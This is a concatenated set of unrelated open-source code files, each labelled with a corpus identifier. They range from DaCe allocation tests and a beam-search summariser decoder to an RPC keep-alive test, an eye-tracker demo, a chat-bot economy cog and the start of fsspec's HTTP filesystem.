for _, _, arr in sdfg.arrays_recursive():
if arr.transient and arr.storage == dace.StorageType.GPU_Global:
arr.lifetime = dace.AllocationLifetime.Persistent
A = np.random.rand(5, 3)
result = sdfg(A=A)
assert np.allclose(np.transpose(A), result)
def test_alloc_persistent_register():
""" Tries to allocate persistent register array. Should fail. """
@dace.program
def lifetimetest(input: dace.float64[N]):
tmp = dace.ndarray([1], input.dtype)
return tmp + 1
sdfg: dace.SDFG = lifetimetest.to_sdfg()
sdfg.arrays['tmp'].storage = dace.StorageType.Register
sdfg.arrays['tmp'].lifetime = dace.AllocationLifetime.Persistent
try:
sdfg.validate()
raise AssertionError('SDFG should not be valid')
except dace.sdfg.InvalidSDFGError:
print('Exception caught, test passed')
def test_alloc_persistent():
@dace.program
def persistentmem(output: dace.int32[1]):
tmp = dace.ndarray([1], output.dtype, lifetime=dace.AllocationLifetime.Persistent)
if output[0] == 1.0:
tmp[0] = 0
else:
tmp[0] += 3
output[0] = tmp[0]
# Repeatedly invoke program. Since memory is persistent, output is expected
# to increase with each call
csdfg = persistentmem.compile()
value = np.ones([1], dtype=np.int32)
csdfg(output=value)
assert value[0] == 1
value[0] = 2
csdfg(output=value)
assert value[0] == 3
csdfg(output=value)
assert value[0] == 6
del csdfg
def test_alloc_persistent_threadlocal():
@dace.program
def persistentmem(output: dace.int32[2]):
tmp = dace.ndarray([2],
output.dtype,
storage=dace.StorageType.CPU_ThreadLocal,
lifetime=dace.AllocationLifetime.Persistent)
if output[0] == 1.0:
for i in dace.map[0:2]:
tmp[i] = i
else:
for i in dace.map[0:2]:
tmp[i] += 3
output[i] = tmp[i]
# Repeatedly invoke program. Since memory is persistent, output is expected
# to increase with each call
csdfg = persistentmem.compile()
value = np.ones([2], dtype=np.int32)
csdfg(output=value)
assert value[0] == 1
assert value[1] == 1
value[0] = 4
value[1] = 2
csdfg(output=value)
assert value[0] == 3
assert value[1] == 4
csdfg(output=value)
assert value[0] == 6
assert value[1] == 7
del csdfg
def test_alloc_multistate():
i = dace.symbol('i')
sdfg = dace.SDFG('multistate')
sdfg.add_array('A', [20], dace.float64)
sdfg.add_array('B', [20], dace.float64)
sdfg.add_transient('tmp', [i + 1], dace.float64)
init = sdfg.add_state()
end = sdfg.add_state()
s2 = sdfg.add_state()
sdfg.add_loop(init, s2, end, 'i', '0', 'i < 5', 'i + 1')
s1 = sdfg.add_state_before(s2)
ar = s1.add_read('A')
tw = s1.add_write('tmp')
s1.add_nedge(ar, tw, dace.Memlet('A[0:i+1]'))
tr = s2.add_read('tmp')
bw = s2.add_write('B')
s2.add_nedge(tr, bw, dace.Memlet('tmp'))
A = np.random.rand(20)
B = np.random.rand(20)
sdfg(A=A, B=B)
assert np.allclose(A[:5], B[:5])
def test_nested_view_samename():
@dace.program
def incall(a, b):
tmp = a.reshape([10, 2])
tmp[:] += 1
return tmp
@dace.program
def top(a: dace.float64[20]):
tmp = dace.ndarray([20], dace.float64, lifetime=dace.AllocationLifetime.Persistent)
return incall(a, tmp)
sdfg = top.to_sdfg(simplify=False)
a = np.random.rand(20)
ref = a.copy()
b = sdfg(a)
assert np.allclose(b, ref.reshape(10, 2) + 1)
def test_nested_persistent():
@dace.program
def nestpers(a):
tmp = np.ndarray([20], np.float64)
tmp[:] = a + 1
return tmp
@dace.program
def toppers(a: dace.float64[20]):
return nestpers(a)
sdfg = toppers.to_sdfg(simplify=False)
for _, _, arr in sdfg.arrays_recursive():
if arr.transient:
arr.lifetime = dace.AllocationLifetime.Persistent
a = np.random.rand(20)
b = sdfg(a)
assert np.allclose(b, a + 1)
def test_persistent_scalar():
@dace.program
def perscal(a: dace.float64[20]):
tmp = dace.define_local_scalar(dace.float64, lifetime=dace.AllocationLifetime.Persistent)
tmp[:] = a[1] + 1
return tmp
a = np.random.rand(20)
b = perscal(a)
assert np.allclose(b, a[1] + 1)
if __name__ == '__main__':
test_determine_alloc_scope()
test_determine_alloc_state()
test_determine_alloc_sdfg()
test_determine_alloc_global()
test_persistent_gpu_copy_regression()
test_persistent_gpu_transpose_regression()
test_alloc_persistent_register()
test_alloc_persistent()
test_alloc_persistent_threadlocal()
test_alloc_multistate()
test_nested_view_samename()
test_nested_persistent()
test_persistent_scalar()
|
the-stack_0_3719 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
SeaIceData
A QGIS plugin
Downloads sea ice concentration data from NSIDC
-------------------
begin : 2014-10-02
copyright : (C) 2014 by Louise Ireland
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
# Import the PyQt and QGIS libraries
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from qgis.core import *
# Initialize Qt resources from file resources.py
import resources
# Import the code for the dialog
from seaicedatadialog import SeaIceDataDialog
import os.path
class SeaIceData:
def __init__(self, iface):
# Save reference to the QGIS interface
self.iface = iface
# initialize plugin directory
self.plugin_dir = os.path.dirname(__file__)
# initialize locale
locale = QSettings().value("locale/userLocale")[0:2]
localePath = os.path.join(self.plugin_dir, 'i18n', 'seaicedata_{}.qm'.format(locale))
if os.path.exists(localePath):
self.translator = QTranslator()
self.translator.load(localePath)
if qVersion() > '4.3.3':
QCoreApplication.installTranslator(self.translator)
# Create the dialog (after translation) and keep reference
self.dlg = SeaIceDataDialog()
def initGui(self):
# Create action that will start plugin configuration
self.action = QAction(
QIcon(":/plugins/seaicedata/icon.png"),
u"Sea Ice Data Downloader", self.iface.mainWindow())
# connect the action to the run method
self.action.triggered.connect(self.run)
# Add toolbar button and menu item
self.iface.addToolBarIcon(self.action)
self.iface.addPluginToMenu(u"&Sea Ice Data Downloader", self.action)
def unload(self):
# Remove the plugin menu item and icon
self.iface.removePluginMenu(u"&Sea Ice Data Downloader", self.action)
self.iface.removeToolBarIcon(self.action)
# run method that performs all the real work
def run(self):
# show the dialog
self.dlg.show()
|
the-stack_0_3720 | import inspect
import logging
from typing import Any, Dict, Optional
from panoramic.cli.husky.common.exception_enums import (
ComponentType,
ExceptionGroup,
ExceptionSeverity,
)
from panoramic.cli.husky.common.util import exception_to_string_with_traceback
logger = logging.getLogger(__name__)
class ExceptionTags:
REQUEST_DATA = '_request_data'
class ExceptionHandler:
@classmethod
def track_exception(
cls,
exc: Exception,
exc_group: ExceptionGroup = ExceptionGroup.COMMON,
message: Optional[str] = None,
ddog_tags: Optional[Dict[str, Any]] = None,
severity: ExceptionSeverity = ExceptionSeverity.error,
component: ComponentType = ComponentType.UNKNOWN,
):
"""
Attempt to have one fn logging to stderr, datadog
Let's see how this works for us and we can change later or add it to python lib.
"""
caller_frame = inspect.stack()[1]
called_by = f'File {caller_frame.filename}, line {caller_frame.lineno}, in {caller_frame.function}'
ddog_tags = ddog_tags or dict()
ddog_tags['exception_type'] = type(exc).__name__
ddog_tags['exception_group'] = exc_group.value
ddog_tags['component'] = component.value
ddog_tags['severity'] = severity.value
all_tags = dict()
all_tags.update(ddog_tags)
request_data_str = '<not-set>'
if ExceptionTags.REQUEST_DATA in all_tags:
# Log request data separately, not inside tags, coz it adds one more level of json escaping and is even
# crazier to read
request_data_str = str(all_tags[ExceptionTags.REQUEST_DATA])
del all_tags[ExceptionTags.REQUEST_DATA]
logger.error(
f'Message: {message} Called by: {called_by}. '
f'Exception: {exception_to_string_with_traceback(exc)} Tags: {all_tags} '
f'{request_data_str}'
)
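# Usage sketch (the operation name and tag payload are illustrative assumptions):
#   try:
#       do_risky_work()
#   except Exception as exc:
#       ExceptionHandler.track_exception(
#           exc,
#           exc_group=ExceptionGroup.COMMON,
#           message='do_risky_work failed',
#           ddog_tags={ExceptionTags.REQUEST_DATA: '<request payload>'},
#       )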
|
the-stack_0_3721 | #Except for the pytorch part content of this file is copied from https://github.com/abisee/pointer-generator/blob/master/
from __future__ import unicode_literals, print_function, division
import sys
# reload(sys)
# sys.setdefaultencoding('utf8')
import imp
imp.reload(sys)
import os
import time
import torch
from torch.autograd import Variable
import sys
sys.path.append('/home/kxiao/pointer_generator_pytorch/')
from data_util.batcher import Batcher
from data_util.data import Vocab
from data_util import data, config
from model import Model
from data_util.utils import write_for_rouge, rouge_eval, rouge_log
from train_util import get_input_from_batch
use_cuda = config.use_gpu and torch.cuda.is_available()
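# A Beam holds one partial decoding hypothesis: the token ids emitted so far,
# their log-probabilities, the decoder LSTM state, the attention context vector
# and (when coverage is enabled) the coverage vector.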
class Beam(object):
def __init__(self, tokens, log_probs, state, context, coverage):
self.tokens = tokens
self.log_probs = log_probs
self.state = state
self.context = context
self.coverage = coverage
def extend(self, token, log_prob, state, context, coverage):
return Beam(tokens = self.tokens + [token],
log_probs = self.log_probs + [log_prob],
state = state,
context = context,
coverage = coverage)
@property
def latest_token(self):
return self.tokens[-1]
@property
def avg_log_prob(self):
return sum(self.log_probs) / len(self.tokens)
class BeamSearch(object):
def __init__(self, model_file_path):
model_name = os.path.basename(model_file_path)
self._decode_dir = os.path.join(config.log_root, 'decode_%s' % (model_name))
self._rouge_ref_dir = os.path.join(self._decode_dir, 'rouge_ref')
self._rouge_dec_dir = os.path.join(self._decode_dir, 'rouge_dec_dir')
for p in [self._decode_dir, self._rouge_ref_dir, self._rouge_dec_dir]:
if not os.path.exists(p):
os.mkdir(p)
self.vocab = Vocab(config.vocab_path, config.vocab_size)
self.batcher = Batcher(config.decode_data_path, self.vocab, mode='decode',
batch_size=config.beam_size, single_pass=True)
time.sleep(15)
self.model = Model(model_file_path, is_eval=True)
def sort_beams(self, beams):
return sorted(beams, key=lambda h: h.avg_log_prob, reverse=True)
def decode(self):
start = time.time()
counter = 0
batch = self.batcher.next_batch()
        # In the newer architecture this loop lives in the decode part of training.
while batch is not None:
# Run beam search to get best Hypothesis
best_summary = self.beam_search(batch)
# Extract the output ids from the hypothesis and convert back to words
output_ids = [int(t) for t in best_summary.tokens[1:]]
decoded_words = data.outputids2words(output_ids, self.vocab,
(batch.art_oovs[0] if config.pointer_gen else None))
# Remove the [STOP] token from decoded_words, if necessary
try:
fst_stop_idx = decoded_words.index(data.MARK_EOS)
decoded_words = decoded_words[:fst_stop_idx]
except ValueError:
decoded_words = decoded_words
original_abstract_sents = batch.original_abstracts_sents[0]
original_article = batch.original_articles[0]
            # English output (ROUGE reference/decoded files):
# write_for_rouge(original_abstract_sents, decoded_words, counter,
# self._rouge_ref_dir, self._rouge_dec_dir)
            # Chinese output (plain-text result file):
self.write_result(original_article, original_abstract_sents,
decoded_words, counter)
counter += 1
# if counter % 1000 == 0:
# print('%d example in %d sec'%(counter, time.time() - start))
# start = time.time()
batch = self.batcher.next_batch()
# print("Decoder has finished reading dataset for single_pass.")
# print("Now starting ROUGE eval...")
# results_dict = rouge_eval(self._rouge_ref_dir, self._rouge_dec_dir)
# rouge_log(results_dict, self._decode_dir)
def write_result(self, original_title, reference_summarization,
decoded_words, ex_index):
"""
Write output to file.
Args:
reference_sents: list of strings
decoded_words: list of strings
ex_index: int, the index with which to label the files
"""
summarization = ''.join(decoded_words)
# Write to file
result_file = os.path.join(self._decode_dir, "result.txt")
        # Append so each decoded example accumulates in result.txt instead of overwriting the previous one.
        with open(result_file, 'a') as f:
f.write(
original_title + '\t\t' +
reference_summarization + '\t\t' +
summarization + "\n")
print("Wrote example %i to file" % ex_index)
def beam_search(self, batch):
#batch should have only one example
enc_batch, enc_padding_mask, enc_lens, enc_batch_extend_vocab, extra_zeros, c_t_0, coverage_t_0 = \
get_input_from_batch(batch, use_cuda)
encoder_outputs, encoder_feature, encoder_hidden = self.model.encoder(enc_batch, enc_lens)
s_t_0 = self.model.reduce_state(encoder_hidden)
dec_h, dec_c = s_t_0 # 1 x 2*hidden_size
dec_h = dec_h.squeeze()
dec_c = dec_c.squeeze()
#decoder batch preparation, it has beam_size example initially everything is repeated
beams = [Beam(tokens=[self.vocab.word2id(data.MARK_GO)],
log_probs=[0.0],
state=(dec_h[0], dec_c[0]),
context = c_t_0[0],
coverage=(coverage_t_0[0] if config.is_coverage else None))
for _ in range(config.beam_size)]
results = []
steps = 0
while steps < config.max_dec_steps and len(results) < config.beam_size:
latest_tokens = [h.latest_token for h in beams]
latest_tokens = [t if t < self.vocab.size() else self.vocab.word2id(data.MARK_UNK) \
for t in latest_tokens]
            y_t_1 = Variable(torch.LongTensor(latest_tokens)) # tensor of the latest token per beam
if use_cuda:
y_t_1 = y_t_1.cuda()
all_state_h =[]
all_state_c = []
all_context = []
for h in beams:
state_h, state_c = h.state
all_state_h.append(state_h)
all_state_c.append(state_c)
all_context.append(h.context)
s_t_1 = (torch.stack(all_state_h, 0).unsqueeze(0), torch.stack(all_state_c, 0).unsqueeze(0))
c_t_1 = torch.stack(all_context, 0)
coverage_t_1 = None
if config.is_coverage:
all_coverage = []
for h in beams:
all_coverage.append(h.coverage)
coverage_t_1 = torch.stack(all_coverage, 0)
final_dist, s_t, c_t, attn_dist, p_gen, coverage_t = self.model.decoder(y_t_1, s_t_1,
encoder_outputs, encoder_feature, enc_padding_mask, c_t_1,
extra_zeros, enc_batch_extend_vocab, coverage_t_1, steps)
log_probs = torch.log(final_dist)
topk_log_probs, topk_ids = torch.topk(log_probs, config.beam_size * 2)
dec_h, dec_c = s_t
dec_h = dec_h.squeeze()
dec_c = dec_c.squeeze()
all_beams = []
num_orig_beams = 1 if steps == 0 else len(beams)
            for i in range(num_orig_beams): # for each existing hypothesis
h = beams[i]
state_i = (dec_h[i], dec_c[i])
context_i = c_t[i]
coverage_i = (coverage_t[i] if config.is_coverage else None)
for j in range(config.beam_size * 2): # for each of the top 2*beam_size hyps:
new_beam = h.extend(token=topk_ids[i, j].item(),
log_prob=topk_log_probs[i, j].item(),
state=state_i,
context=context_i,
coverage=coverage_i)
all_beams.append(new_beam)
beams = []
for h in self.sort_beams(all_beams):
if h.latest_token == self.vocab.word2id(data.MARK_EOS):
if steps >= config.min_dec_steps:
results.append(h)
else:
beams.append(h)
if len(beams) == config.beam_size or len(results) == config.beam_size:
break
steps += 1
if len(results) == 0:
results = beams
beams_sorted = self.sort_beams(results)
return beams_sorted[0]
if __name__ == '__main__':
model_filename = sys.argv[1]
beam_Search_processor = BeamSearch(model_filename)
beam_Search_processor.decode()
|
the-stack_0_3723 | #!/usr/bin/env python3
# Copyright (c) 2014-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the RPC HTTP basics."""
from test_framework.test_framework import KabberryTestFramework
from test_framework.util import *
import http.client
import urllib.parse
class HTTPBasicsTest (KabberryTestFramework):
def set_test_params(self):
self.num_nodes = 3
def setup_network(self):
self.setup_nodes()
def run_test(self):
#################################################
# lowlevel check for http persistent connection #
#################################################
url = urllib.parse.urlparse(self.nodes[0].url)
authpair = url.username + ':' + url.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1) #must also response with a correct json-rpc message
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
conn.close()
#same should be if we add keep-alive because this should be the std. behaviour
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection": "keep-alive"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1) #must also response with a correct json-rpc message
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
conn.close()
#now do the same with "Connection: close"
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection":"close"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock==None) #now the connection must be closed after the response
#node1 (2nd node) is running with disabled keep-alive option
urlNode1 = urllib.parse.urlparse(self.nodes[1].url)
authpair = urlNode1.username + ':' + urlNode1.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode1.hostname, urlNode1.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
#node2 (third node) is running with standard keep-alive parameters which means keep-alive is on
urlNode2 = urllib.parse.urlparse(self.nodes[2].url)
authpair = urlNode2.username + ':' + urlNode2.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
        assert(conn.sock!=None) #connection must still be open because kabberryd uses keep-alive by default
# Check excessive request size
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*1000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.NOT_FOUND)
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*10000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.BAD_REQUEST)
if __name__ == '__main__':
HTTPBasicsTest ().main ()
|
the-stack_0_3726 | #!/usr/bin/env python
# Copyright (C) 2013 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from util import resolve_url
class TestResolveUrl(unittest.TestCase):
""" run to test:
python -m unittest -v util_test
"""
def testKnown(self):
url = resolve_url('GERRIT:foo.jar', {})
self.assertEqual(url,
'http://gerrit-maven.storage.googleapis.com/foo.jar')
def testKnownRedirect(self):
url = resolve_url('MAVEN_CENTRAL:foo.jar',
{'MAVEN_CENTRAL': 'https://my.company.mirror/maven2'})
self.assertEqual(url, 'https://my.company.mirror/maven2/foo.jar')
def testCustom(self):
url = resolve_url('https://maven.example.com/release/foo.jar', {})
self.assertEqual(url, 'https://maven.example.com/release/foo.jar')
def testCustomRedirect(self):
url = resolve_url('MAVEN_EXAMPLE:foo.jar',
{'MAVEN_EXAMPLE':
'https://maven.example.com/release'})
self.assertEqual(url, 'https://maven.example.com/release/foo.jar')
if __name__ == '__main__':
unittest.main()
|
the-stack_0_3732 | #!/usr/bin/env python3
"""
Read class averages mrc file and save it to jpg.
Automatically remove the edges.
INPUT: mrcs file of 2D class averages
OUTPUT: a dir for the jpg output
The name of each jpg file is "<name>_<class number>.jpg", where <name> is the -n argument (e.g. "particlename_diamxxkxx").
"""
import os
import mrcfile
import numpy as np
from PIL import Image
import argparse
import shutil
from . import imgprep
# from .lib import utils
def setupParserOptions():
ap = argparse.ArgumentParser()
ap.add_argument('-i', '--input',
help="Input mrcs file of 2D class averages.")
ap.add_argument('-n', '--name', default='particle',
help="Name of the particle")
ap.add_argument('-o', '--output', default='2DAssess',
help="Output jpg dir.")
args = vars(ap.parse_args())
return args
def mrcs2jpg(args):
print('Converting mrcs to jpg....')
os.chdir(os.path.abspath(os.path.dirname(args['input']))) # navigate to the par dir of input file
try:
shutil.rmtree(args['output'])
except OSError:
pass
os.mkdir(args['output'])
os.mkdir(os.path.join(args['output'], 'data'))
avg_mrc = mrcfile.open(os.path.basename(args['input'])).data
if len(avg_mrc.shape) == 3:
num_part = avg_mrc.shape[0]
elif len(avg_mrc.shape) == 2:
num_part = 1
for i in range(num_part):
new_img = avg_mrc[i,:,:]
if np.sum(new_img) > 1e-7 or np.sum(new_img) < -1e-7:
new_img = imgprep.cutByRadius(new_img)
new_img = ((new_img-new_img.min())/((new_img.max()-new_img.min())+1e-7)*255).astype('uint8')
new_img = Image.fromarray(new_img)
new_img = new_img.convert("L")
new_img.save(os.path.join(args['output'], 'data', (args['name'] + '_' + str(i+1) + '.jpg')))
if __name__ == '__main__':
args = setupParserOptions()
mrcs2jpg(args)
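# Example invocation (sketch; package and file names are illustrative, and the
# relative import of imgprep means this normally runs as a module):
#   python -m mypackage.mrcs2jpg -i particle_classes.mrcs -n particle -o 2DAssess
# JPGs are written to <output>/data/ as <name>_<class number>.jpg.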
|
the-stack_0_3733 | import smtplib
import ast
import getpass
import sys
#ENTER DETAILS BELOW
DEFAULT_RECIPIENT = ''
pwd = ""
def send_mail(mailfile,SUBJECT,recipient = DEFAULT_RECIPIENT):
if recipient == '.':
recipient = DEFAULT_RECIPIENT
s = smtplib.SMTP('smtp.gmail.com', 587)
s.starttls()
s.login(DEFAULT_RECIPIENT, str(pwd))
if mailfile == '.':
mailfile = "my_mail_auto.txt"
f = open(mailfile,'w')
f.write("Test Mail")
f.close()
f = open(mailfile,'r')
TEXT = f.read()
f.close()
message = 'Subject: {}\n\n{}'.format(SUBJECT, TEXT)
s.sendmail(DEFAULT_RECIPIENT, recipient, message)
s.quit()
if __name__ == '__main__':
if len(sys.argv)<3:
print("Check number of arguments: py mail_sender.py mailfile(.) subjectstr recepient") #recipient argument is mandatory
sys.exit(-1)
send_mail(sys.argv[1]," ".join(sys.argv[2:-1]),sys.argv[-1])
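# Example invocation (sketch; the subject and address are illustrative):
#   python mail_sender.py . "Status update" [email protected]
# Passing "." as the mail file sends a default "Test Mail" body; passing "." as
# the recipient falls back to DEFAULT_RECIPIENT.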
|
the-stack_0_3737 | import voltage
from voltage.ext import commands
import random
from utils import get_db, check_account, cooldown
# (name, multiplier)
people = [
("Enoki", 1),
("Insert", 1.2),
("NotJan", 0.9),
("Jan", 1),
("Delta", 1.2),
("z3", 0.1),
("atal", 1.5),
("Fatal", 1.2),
]
# (message, (min, max), weight)
scenarios = [
("{name} saw you begging and graciously gave you {amount} SusCoins.", (1, 100), 1),
("WOW, {name} gave you {amount} SusCoins for because they're like very kind and stuff.", (50, 100), 0.8),
]
def setup(client) -> commands.Cog:
economy = commands.Cog("Economy", "Simple economy commands.")
@check_account()
@economy.command(aliases=['bal', 'b'])
async def balance(ctx):
"""Check your balance."""
conn = get_db()
cur = conn.cursor()
cur.execute("SELECT balance FROM economy WHERE user_id = ?", (ctx.author.id,))
bal = cur.fetchone()[0]
await ctx.reply(f"Your balance is **__{bal}__** SusCoins.")
# @cooldown("beg", 20)
@check_account()
@economy.command()
async def beg(ctx):
"""Beg for money."""
conn = get_db()
cur = conn.cursor()
cur.execute("SELECT balance FROM economy WHERE user_id = ?", (ctx.author.id,))
bal = cur.fetchone()[0]
person = random.choice(people)
scenario = random.choices(scenarios, weights=[x[2] for x in scenarios])[0]
amount = int(random.randint(scenario[1][0], scenario[1][1]) * person[1])
cur.execute("UPDATE economy SET balance = balance + ? WHERE user_id = ?", (amount, ctx.author.id))
conn.commit()
cur.close()
conn.close()
await ctx.reply(scenario[0].format(name=f"**{person[0]}**", amount=f"**__{amount}__**"))
return economy
|
the-stack_0_3738 | # 107. Binary Tree Level Order Traversal II
# [email protected]
# Given a binary tree, return the bottom-up level order traversal of its nodes' values. (ie, from left to right, level by level from leaf to root).
# For example:
# Given binary tree [3,9,20,null,null,15,7],
# 3
# / \
# 9 20
# / \
# 15 7
# return its bottom-up level order traversal as:
# [
# [15,7],
# [9,20],
# [3]
# ]
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def levelOrderBottom(self, root):
"""
:type root: TreeNode
:rtype: List[List[int]]
"""
# sol 1:
# BFS iterative
# runtime: 48ms
if not root:
return []
queue = [root]
res = []
while queue:
vals = [node.val if node else None for node in queue]
res.append(vals)
queue = [leaf for q in queue for leaf in (q.left, q.right) if leaf]
return res[::-1]
# sol 2
# BFS iterative
# runtime: 47ms
if not root:
return []
queue = [(root, 0)]
res = collections.defaultdict(list)
while queue:
node, depth = queue.pop()
res[depth].append(node.val)
if node.right:
queue.append((node.right, depth + 1))
if node.left:
queue.append((node.left, depth + 1))
return res.values()[::-1]
|
the-stack_0_3739 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Simple iohub eye tracker device demo.
Select which tracker to use by setting the TRACKER variable below.
"""
from __future__ import absolute_import, division, print_function
from psychopy import core, visual
from psychopy.iohub import launchHubServer
from psychopy.iohub.util import hideWindow, showWindow
# Eye tracker to use ('mouse', 'eyelink', 'gazepoint', or 'tobii')
TRACKER = 'mouse'
eyetracker_config = dict(name='tracker')
devices_config = {}
if TRACKER == 'mouse':
devices_config['eyetracker.hw.mouse.EyeTracker'] = eyetracker_config
elif TRACKER == 'eyelink':
eyetracker_config['model_name'] = 'EYELINK 1000 DESKTOP'
eyetracker_config['runtime_settings'] = dict(sampling_rate=1000, track_eyes='RIGHT')
devices_config['eyetracker.hw.sr_research.eyelink.EyeTracker'] = eyetracker_config
elif TRACKER == 'gazepoint':
devices_config['eyetracker.hw.gazepoint.gp3.EyeTracker'] = eyetracker_config
elif TRACKER == 'tobii':
devices_config['eyetracker.hw.tobii.EyeTracker'] = eyetracker_config
else:
print("{} is not a valid TRACKER name; please use 'mouse', 'eyelink', 'gazepoint', or 'tobii'.".format(TRACKER))
core.quit()
# Number if 'trials' to run in demo
TRIAL_COUNT = 2
# Maximum trial time / time timeout
T_MAX = 60.0
win = visual.Window((1920, 1080),
units='pix',
fullscr=True,
allowGUI=False,
colorSpace='rgb255',
monitor='55w_60dist',
color=[128, 128, 128]
)
win.setMouseVisible(False)
text_stim = visual.TextStim(win, text="Start of Experiment",
pos=[0, 0], height=24,
color='black', units='pix', colorSpace='named',
wrapWidth=win.size[0] * .9)
text_stim.draw()
win.flip()
io = launchHubServer(window=win, **devices_config)
# Get some iohub devices for future access.
keyboard = io.getDevice('keyboard')
tracker = io.getDevice('tracker')
# Minimize the PsychoPy window if needed
hideWindow(win)
# Display calibration gfx window and run calibration.
result = tracker.runSetupProcedure()
print("Calibration returned: ", result)
# Maximize the PsychoPy window if needed
showWindow(win)
gaze_ok_region = visual.Circle(win, lineColor='black', radius=300, units='pix', colorSpace='named')
gaze_dot = visual.GratingStim(win, tex=None, mask='gauss', pos=(0, 0),
size=(40, 40), color='green', colorSpace='named', units='pix')
text_stim_str = 'Eye Position: %.2f, %.2f. In Region: %s\n'
text_stim_str += 'Press space key to start next trial.'
missing_gpos_str = 'Eye Position: MISSING. In Region: No\n'
missing_gpos_str += 'Press space key to start next trial.'
text_stim.setText(text_stim_str)
# Run Trials.....
t = 0
while t < TRIAL_COUNT:
io.clearEvents()
tracker.setRecordingState(True)
run_trial = True
tstart_time = core.getTime()
while run_trial is True:
# Get the latest gaze position in display coord space.
gpos = tracker.getLastGazePosition()
# Update stim based on gaze position
valid_gaze_pos = isinstance(gpos, (tuple, list))
gaze_in_region = valid_gaze_pos and gaze_ok_region.contains(gpos)
if valid_gaze_pos:
# If we have a gaze position from the tracker, update gc stim and text stim.
if gaze_in_region:
gaze_in_region = 'Yes'
else:
gaze_in_region = 'No'
text_stim.text = text_stim_str % (gpos[0], gpos[1], gaze_in_region)
gaze_dot.setPos(gpos)
else:
# Otherwise just update text stim
text_stim.text = missing_gpos_str
# Redraw stim
gaze_ok_region.draw()
text_stim.draw()
if valid_gaze_pos:
gaze_dot.draw()
# Display updated stim on screen.
flip_time = win.flip()
# Check any new keyboard char events for a space key.
# If one is found, set the trial end variable.
#
if keyboard.getPresses(keys=' '):
run_trial = False
elif core.getTime()-tstart_time > T_MAX:
run_trial = False
win.flip()
# Current Trial is Done
# Stop eye data recording
tracker.setRecordingState(False)
t += 1
# All Trials are done
# End experiment
win.close()
tracker.setConnectionState(False)
io.quit()
core.quit()
|
the-stack_0_3740 | from copy import deepcopy
from typing import List
class Solution:
def XXX(self, nums: List[int]) -> List[List[int]]:
flag = [0 for i in nums]
res = [[]]
for i in nums:
tem = deepcopy(res)
for j in range(len(tem)):
tem[j].append(i)
res.extend(tem)
return res
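# Example (sketch): Solution().XXX([1, 2]) returns [[], [1], [2], [1, 2]]; each
# element doubles the subset count by appending itself to copies of the
# subsets collected so far.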
|
the-stack_0_3741 | from __future__ import print_function, division, absolute_import
import re
import requests
from fsspec import AbstractFileSystem
from fsspec.utils import tokenize, DEFAULT_BLOCK_SIZE
# https://stackoverflow.com/a/15926317/3821154
ex = re.compile(r"""<a\s+(?:[^>]*?\s+)?href=(["'])(.*?)\1""")
ex2 = re.compile(r"""(http[s]?://[-a-zA-Z0-9@:%_+.~#?&/=]+)""")
class HTTPFileSystem(AbstractFileSystem):
"""
Simple File-System for fetching data via HTTP(S)
``ls()`` is implemented by loading the parent page and doing a regex
    match on the result. If simple_links=True, anything that looks like a URL
    (e.g. "http(s)://server.com/stuff?thing=other") will be matched; otherwise
    only links within HTML href tags will be used.
"""
sep = '/'
def __init__(self, **storage_options):
"""
Parameters
----------
block_size: int
Blocks to read bytes; if 0, will default to raw requests file-like
objects instead of HTTPFile instances
simple_links: bool
If True, will consider both HTML <a> tags and anything that looks
like a URL; if False, will consider only the former.
storage_options: key-value
May be credentials, e.g., `{'auth': ('username', 'pword')}` or any
other parameters passed on to requests
"""
